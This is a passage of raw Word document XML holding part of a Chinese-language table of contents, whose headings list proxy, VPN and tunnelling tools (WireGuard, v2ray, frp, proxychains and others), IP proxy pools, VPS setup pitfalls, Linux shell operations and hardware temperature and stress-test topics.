              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779611 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>121</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E640F1F" w14:textId="1BC17872" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779612" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VPN:wireguard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779612 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>121</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FA4D6AD" w14:textId="508ED6BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779613" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gost</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779613 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01CC9074" w14:textId="1FAB946C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779614" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>挂代理检测</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779614 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FCE714F" w14:textId="44ADE832" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779615" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>racknerd</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vps</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>搭建的坑点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779615 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DDD9BE6" w14:textId="4BAC47BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779616" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>glider</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779616 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49B299E0" w14:textId="42EDF493" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779617" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>microsocks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779617 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63C5FF9D" w14:textId="1E6400D7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779618" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ssr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DEC10B0" w14:textId="3145BA4C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779619" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>v2ray</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="244903EF" w14:textId="7047B5BE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779620" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>proxychains</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779620 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2028B30E" w14:textId="59C78FE7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779621" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>frp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779621 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5469E1A6" w14:textId="7DBE4C4C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779622" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779622 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D0274AB" w14:textId="0534C15C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779623" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>代理池：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>smartdaili</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779623 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6242BC61" w14:textId="13DC5CCA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779624" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>代理池：快代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779624 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3541C39C" w14:textId="5369C33B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779625" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运维及</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779625 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36FA0081" w14:textId="788BE4E8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779626" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>硬件维护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779626 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FF21D9F" w14:textId="0BD3B473" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779627" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CPU</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GPU</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、进风口和出风口温度</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779627 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76671E8C" w14:textId="2786DE99" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779628" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cpu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>压力测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
